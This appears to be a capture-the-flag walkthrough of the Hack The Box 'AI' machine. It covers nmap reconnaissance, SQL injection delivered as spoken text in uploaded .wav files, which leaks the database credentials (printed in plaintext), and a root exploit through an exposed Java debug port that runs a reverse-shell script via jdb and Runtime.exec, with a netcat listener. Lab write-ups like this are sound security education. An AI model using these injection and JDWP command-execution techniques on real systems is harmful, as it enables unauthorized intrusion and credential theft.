In this article you well learn the following:
- Scanning targets using nmap.
- Explit SQL Injection via Speech To Text Recognition.
- Enumerate System
- Exploit JDWP ( Java Debug Wire Protocol )
I begin reconnaissance by running an Nmap scan checking default scripts and testing for vulnerabilities.
[email protected]:~/Desktop/HTB/AI# nmap -Pn -sC -sV 10.10.10.163 -v
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-24 09:22 EST
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| 2048 6d:16:f4:32:eb:46:ca:37:04:d2:a5:aa:74:ed:ab:fc (RSA) |_ 256 85:2e:7d:66:30:a6:6e:30:04:82:c1:ae:ba:a4:99:bd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Hello AI! Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Then, I started running gobuster to search and bruteforce for files and directories:
I found the following directories and files : ai.php , intelligence.php.
In intelligence.php there’s some commands can processed by API. In ai.php there’s upload, we need to upload .wav file and will process it.
There’s Note in intelligence.php. The note was “Note: Currently our is API well familiar with Male-US mode convert test 2 speech using Text2Speech select voice : Male US”.
After playing with the sound file to find a vulnerability on the upload functionality, I found that it vulnerable to SQLi.
When I uploaded a wav file the contains : “Text: Open Single Quote” i got the following error message.
After that, I generate wav files the contain text as follows. My aim was to extract the username and password from the database.
Text “Open Single Quote or one equals one Comment Database” generated the following error:
Text “Open Single Quote order by 3 Comment Database” generated the following error:
Text “Open Single Quote order by 1 Comment Database” generated the following error :
After a Good Time with SQL Injection , I Decide To Try This Command “Open single quote union select space username from users Comment Database”. The command retrieve the username from the database.
For the password, I used this command “Open single quote union select space password from users Comment Database” :
Now i have the following credentials :
• Username: alexa
• Password: H,Sq9t6}a<)?q93_
So, I used them to connect to the SSH service and I got the user.txt file.
For root part and after some enumeration, I run the following two commands :
- ps aux | grep “root”
- netstat -ntulp
Their results were as following:
There’s a listen ports in localhost (127.0.0.1) , and java debugger running on port 8000, so I need to make port forwarding to access these ports , i used sshuttle tool :
sshuttle -r [email protected] 127.0.0.1
OK, let me explain the exploit. I need to make a breakpoint to callable function (like programming when you make breakpoint in debugging stage), then I used a method in java to run system command : java.lang.Runtime().exec(“”) .
After searching and enumeration, I found this method java.net.ServerSocket.accept() this method
called when there’s a new connection to server to that i used a trick with nc.
First I created a reverse shell file in /tmp/ :
Then, I run the following command:
chmod +x revshell.sh
Then i setup needed commands :
After Connection to jdb -attach 127.0.0.1:8000
stop in java.net.ServerSocket.accept() .
To hit this breakpoint i use nc 127.0.0.1 8005 , or any listen port .
Run a nc listener nc -lvnp 9090 .
Run print new java.lang.Runtime().exec(“/tmp/revshell.sh”) .